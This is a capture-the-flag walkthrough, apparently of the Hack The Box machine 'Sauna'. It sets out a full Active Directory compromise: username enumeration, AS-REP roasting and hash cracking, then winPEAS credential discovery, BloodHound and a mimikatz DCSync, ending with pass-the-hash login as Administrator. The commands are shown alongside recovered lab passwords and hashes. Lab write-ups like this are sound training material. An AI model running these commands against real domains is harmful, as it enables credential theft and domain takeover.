Sauna
Starting off with nmap
nmap -sC -sV -oA nmap/ -T4 10.129.171.194
# Nmap 7.93 scan initiated Sat Feb 4 19:57:04 2023 as: /snap/nmap/2864/usr/bin/nmap -sC -sV -oA nmap/ -T4 10.129.171.194
Nmap scan report for 10.129.171.194
Host is up (0.052s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Egotistical Bank :: Home
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-02-05 00:57:17Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 7h00m00s
| smb2-time:
| date: 2023-02-05T00:57:22
|_ start_date: N/A
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Feb 4 19:58:00 2023 -- 1 IP address (1 host up) scanned in 55.31 seconds
Results tell us a lot, there is a web site on port 80, and judging on ports 53,88 we are dealing with Active Directory. Also, there is a domain EGOTISTICAL-BANK.LOCAL0. . Let's add that to our hosts file just in case
127.0.0.1 localhost
127.0.1.1 joonas-VirtualBox
# The following lines are desirable for IPv6 capable hosts
::1 ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.129.138.100 eforenzics.htb
10.129.171.194 EGOTISTICAL-BANK.LOCAL EGOISTICAL-BANK.LOCAL0 >
The web page has an about page with some members of the team.
Nothing groundbreaking but some of them could have accounts on the server. Let's create a simple wordlist of them. Common naming scheme could be in format firstname.lastname or first letter of the firstname followed by lastname. The wordlist could be like this:
fergus.smith
f.smith
fsmith
shaun.cois
s.cois
scois
hugo.bear
h.bear
hbear
bowie.taylor
b.taylor
btaylor
sophie.driver
s.driver
sdriver
steven.kerb
s.kerb
skerb
Let's save that on a file called users.txt and use kerbrute to check if any of them are valid.
kerbrute userenum -d EGOTISTICAL-BANK.LOCAL users.txt --dc 10.129.171.194
We got one user!
Next, we could check if that user is Kerberoastable using Impacket. First, create a file called user.txt and store fsmith on it and then run
GetNPUsers.py EGOTISTICAL-BANK.LOCAL/ -dc-ip 10.129.171.194 -usersfile user.txt -format hashcat -outputfile hashes.txt
We get a hash!
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:b5bb182b0566624d92c2dc3730913e83$46f35af25be50bd9ef384598fb51991de8af3f8e74a3f6116586fb75ea48b1f7f9c732da6779111a20666014900bf1935deec5ac25e5a4059d24f2bc8ea3cf6a791e8e3ee48c6dc868edc7b949f63e7e3012c0ae16ee104383f1b9b11c3518c8fa5c12724386a88c7e9d0161665871b511fd07bd0dff2f372082d0ae737c699eacf724cec9e742d1950c151e6560be53b698823106f390c67e6db41b9ec6a0c41c597eb0a1d177cc3519c78c6f86cb02fa1e6551ceacdb01540ab6531f1b868c263dbdcf7f4e194cf69ee9e4c772640c4fc065d5928bcc7f4107853764ad5adcf9e9ef19824418c45bf6391c7ae1248d91ffa77d654cc3993e1d3e329d4b9bb3
This can be cracked with hashcat:
.\hashcat.exe .\hash.txt .\rockyou.txt
We get the password: 'Thestrokes23'. Now we can access the server via evil-winrm:
evil-winrm -u fsmith -p Thestrokes23 -i 10.129.171.194
Running winPEAS Reveals us some auto logon creds:
Interestingly, there is no user svcloanmanager on the server but svcloanmgr exists. We can login on his credentials via evil-winr:
evil-winrm -u svc_loanmgr -p Moneymakestheworldgoround! -i 10.129.171.194
Next, let's use Bloodhound to enumerate some more. upload SharpHound to the server and run it:
upload SharpHound.exe
....
./SharpHound.exe
Now, Bloodhound reveals us something nice:
Basically, we can use dcsync attack and get hashes using mimikatz or similiar tool. Let's try that out. Upload mimikatz to it and run it
upload mimikatz.exe
.\mimikatz.exe "lsadump::dcsync /domain:EGOTISTICAL-BANK.LOCAL /user:Administrator" exit
We got Administrators hash! We can use this to login to the server as administrator:
evil-winrm -u Administrator -H 823452073d75b9d1cf70ebdf86c7f98e -i 10.129.171.194
GGs